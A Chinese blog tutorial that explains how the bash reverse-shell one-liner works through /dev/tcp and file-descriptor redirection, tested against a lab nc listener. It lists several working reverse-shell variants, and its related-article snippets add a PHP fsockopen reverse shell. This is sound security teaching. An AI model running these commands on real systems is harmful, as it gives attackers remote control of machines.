反弹shell--bash一句话解析

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量3k 收藏 32
点赞数 8
分类专栏: kali笔记 内网渗透 文章标签: 安全 反弹shell kali
本文链接:https://blog.csdn.net/weixin_43221560/article/details/112436499
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

反弹shell解析

bash反弹shell解析

最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处
真是妙蛙种子被踢出了米奇妙妙屋。。。

bash -i >& /dev/tcp/192.168.1.1/6666 0>&1

测试环境

nc监听主机
IP:192.168.1.1

nc -lvvp 6666

进行反弹shell主机
IP:192.168.1.131

拆分语句了解一下

交互式

bash -i是打开一个交互式的bash

马老师什么是交互式?有问,有答,训练有素(也就是有输入有输出)

#查询当前shell命令是哪一种
ls -l /bin/sh

在这里插入图片描述

#查看是否是交互式
echo $-

在这里插入图片描述

连接设备

/dev/tcp/192.168.1.1/6666

是Linux中的一个特殊设备,也算个文件,打开这个就相当于对指定设备发出了一个socket连接

使用tcp进行建立socket连接,然后可以读写这个socket连接中的数据。

同理tcp改为udp,就是udp连接。

文件描述符

文件描述符,是用来控制bash命令从哪输入与输出到哪的特殊符号

标准输入(STDIN)  			代码0 			
重定向标准输入 				操作符<			默认输入是键盘

标准输出(STDOUT)				代码1			
重定向标准输出 				操作符>或者>>	默认输出显示器

标准错误输出(STDERR)			代码2		   
重定向错误标准输出 			操作符2>或者2>>   默认输出显示器

重定向标准输出和标准错误输出 	操作符&> 		将标准输出和错误输出定向到指定位置

bash -i > /dev/tcp/192.168.1.1/6666
#标准输出重定向为设备,没指定输入,所以默认从键盘输入命令,结果输出到指定的设备(攻击机)

在这里插入图片描述

bash -i < /dev/tcp/192.168.1.1/6666
#标准输如重定向为设备,没指定标准输出,所以默认从屏幕输出结果,从指定设备(攻击机)输入命令

在这里插入图片描述

bash -i < /dev/tcp/192.168.1.1/6666 > /dev/tcp/192.168.1.1/8888
#由于重定向了标准输如和输出,所以从指定设备(攻击机)6666端口输入指令,从指定设备(攻击机)8888端口输出结果

在这里插入图片描述
代码2的标准错误输出又是啥?看下面俩语句:

bash -i > /dev/tcp/192.168.1.1/6666
bash -i 2> /dev/tcp/192.168.1.1/6666

第一个语句是标准输出重定向到设备,也就是命令语句成功执行,返回的结果在指定设备显示
第二个语句是标准错误输出重定向到设备,是命令执行失败,返回的报错显示在指定设备

第二句比方:输入ifconfig,成功执行,不会将结果显示在攻击机;输入ipconfig,执行失败,将执行失败返回的报错显示在攻击机。

合并输入输出

当然在使用的是,不管是正确错误,我们都想在指定设备输出,就可以使用合并

n>&m	将输出文件n重定向到m
n<&m	将输入文件n重定向到m

单独>&这个意思是重定向标准输出和标准错误输出到指定设备

2>&1基本一样,但略有不同

bash -i 2>&1 > /dev/tcp/192.168.1.1/6666
bash -i > /dev/tcp/192.168.1.1/6666	2>&1

注意上面两个的差别:

1原本是屏幕,2也是屏幕,2定向到1还是屏幕,1然后定向到设备,2不会跟着1定向所以还是屏幕。

1原本是屏幕,定向到设备变成了设备,2又定向到1,所以跟着就定向到设备。

这点细微的差距有什么区别呢?

第一个语句,如果当你输入一条错误指令,会在被攻击主机显示报错内容

在这里插入图片描述

第二个语句,不管你正确错误,都会显示在指定设备上
在这里插入图片描述

然后输入与输出合并

bash -i > /dev/tcp/192.168.1.1/6666	0>&1
bash -i > /dev/tcp/192.168.1.1/6666	0<&1

1定向到设备,0是键盘,0定向到1,也就是定向到了设备

就成了我们要的结果,指定设备(攻击机)进行输入,指定设备(攻击机)进行输出
在这里插入图片描述

大合并

懂了原理,反弹语句就千变万化了,只要全定向到设备就ok了。

bash -i >& /dev/tcp/192.168.1.1/6666 0>&1
bash -i > /dev/tcp/192.168.1.1/6666 2>&1 0>&1
bash -i < /dev/tcp/192.168.1.1/6666 2>&0 1>&0
XG小刚
关注
  • 8
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
花一天时间搞懂反弹shell的命令!bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!
weixin_53306211的博客
10-28 1750
【代码】花一天时间搞懂反弹shell的命令!
浅析Linux之bash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
【安全知识】——LInux的shell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 803
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 9000
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
反弹shell bash -i命令
m0_37638874的博客
09-07 3803
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
Linux常用命令
hangoer的博客
08-28 719
命令格式的说明 命令格式:命令 [-选项][参数] 参数 eg: [root@qianfeng01 ~]# ls -la /usr 说明: ⼤部分命令遵从该格式 多个选项时,可以⼀起写 eg: [root@qianfeng01 ~]# ls –l –a ls –la 简化选项与完整选项(注:并⾮所有选项都可使⽤完整选项) eg: [root@qianfeng01 ~]# ls –all ls –a 帮助命令:(相当于命令说明书) 帮助命令 man 英⽂:manual 命令路径:/usr/bin/man 执
bash-shell-to-bat-converter:bash shell脚本到Windows批处理文件的转换器
01-31
在线尝试: : 用法建立: git clone https://github.com/daniel-sc/bash-shell-to-bat-converter.gitcd bash-shell-to-bat-converternpm installnpm run tsc 用法: node lib/cli.js FILE_TO_CONVERT.sh 这将创建...
linux-shell-scripting-fundamentals-bash.epub
05-22
linux-shell-scripting-fundamentals-bash.epub
shell-examples:Little Bash shell脚本示例
01-31
"shell-examples:Little Bash shell脚本示例" 这个标题表明,这是一个关于Bash Shell脚本的小型示例集合。Bash Shell是Linux和类Unix系统中最常用的命令行解释器,它允许用户通过编写脚本来自动化一系列的命令操作...
tree-sitter-bash:tree-sitter的Bash语法
01-31
树木保镖 Bash语法。 发展历程 安装依赖项: npm install 生成并运行测试: npm run build npm run test 在监视模式下运行构建和测试: npm run test:watch 参考文献
bash-shell-生成jwt之mkjwt.txt
06-24
通过bash/shell生成jwt的脚本
【Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1678
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
常用一句反弹shell总结
weixin_45116657的博客
10-19 1297
哈哈哈
反弹shell
soldi_er的博客
04-16 3305
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战记录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
linux各种一句反弹shell总结
mingyqf的博客
01-18 1232
【技术分享】linux各种一句反弹shell总结 阅读量 1355554 | 评论 2 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jT8KDx3o-1642484911491)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhX
【转】Linux之bash反弹shell原理浅析
mastergu2的博客
11-04 2208
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp...
常用的一句反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句反弹shell总结 1. bash直接反弹 2. python一句反弹shell 3. python脚本反弹shell 4. php一句反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句反弹shell 常用的一句反弹she...
Linux反弹Shell
m0_73199983的博客
03-06 1233
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
一句反弹shell代码
09-10
### 回答1: "bash -i >& /dev/tcp/IP地址/端口号 0>&1"。 这是一句简单的 Bash 命令,用于在远程主机上打开一个反弹 shell。它使用了 Bash 的内置命令 "bash -i" 来启动一个交互式 shell,并使用 ">&" 和 "/dev/tcp/IP地址/端口号" 来将 shell 的输入和输出重定向到远程主机上的指定 IP 地址和端口。这样,你就可以在远程主机上运行命令并获得输出,就像在本地 shell 中一样。 注意:使用反弹 shell 是一种非常危险的操作,应该只在拥有合法权限的情况下使用。如果你在没有合法权限的情况下使用反弹 shell,你可能会触犯法律。 ### 回答2: 反弹shell代码是指通过在目标计算机上执行恶意代码,将计算机中的shell连接会转移到攻击者控制的远程服务器上。这样,攻击者就能够远程控制目标计算机。一句反弹shell代码是一种常见的恶意代码,攻击者通常通过利用漏洞将这段代码注入到目标服务器的Web应用程序中。 以下是一个简单的一句反弹shell代码的示例: ``` <?php $sock=fsockopen("攻击者的IP地址",攻击者的端口);shell_exec("/bin/sh -i <&3 >&3 2>&3");?> ``` 以上代码中,“攻击者的IP地址”需要替换为攻击者服务器的实际IP地址,“攻击者的端口”需要替换为攻击者服务器监听的实际端口。 当目标服务器上的Web应用程序执行包含以上代码的恶意请求时,它将尝试与攻击者的服务器建立连接。一旦成功连接,攻击者就可以通过与目标计算机建立的连接会执行命令、获取敏感信息或者进行其他恶意活动。 使用这种方式执行恶意代码是非法的,并且对网络安全造成威胁。为了保护网络安全,服务器管理员需要定期更新软件和系统补丁,同时对输入进行有效的过滤和验证,以防止类似的攻击。 ### 回答3: 反弹shell代码是一种利用网络连接远程控制目标操作系统的方法。以下是一个300字的中文回答: 反弹shell代码是一种用于在网络中远程控制目标操作系统的技术,可以实现向目标计算机发送命令并接收返回结果。该代码通常被黑客用于非法活动,因此对于正当目的者来说,了解反弹shell代码的原理和方法是非常重要的。 反弹shell代码的基本原理是将一个后门程序或指令嵌入到目标系统中,使得黑客可以通过网络连接远程操控目标系统。当黑客成功地将后门程序或指令嵌入到目标系统后,他们就能够通过特定的网络端口或协议监听并等待一个连接。一旦有连接建立,黑客就能够与目标系统建立通信,并发送命令执行特定的操作。 反弹shell代码常见的用途包括获取目标系统的敏感信息、执行某些操作以获取非法利益或破坏目标系统的安全性。因此,了解反弹shell代码以及如何防范其攻击是非常重要的。对于普通用户来说,保持操作系统和软件的最新补丁、不安全网站、可疑附件和链接、避免打开来历不明的文件等都是预防黑客利用反弹shell代码攻击的有效方法。 总而言之,反弹shell代码是一种通过网络连接远程控制目标操作系统的技术。对于黑客来说,它是一种非法的工具,但对于系统管理员和安全专家来说,了解其原理和如何防范攻击是非常重要的。通过采取适当的安全措施,我们可以减少反弹shell代码对我们系统的威胁。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值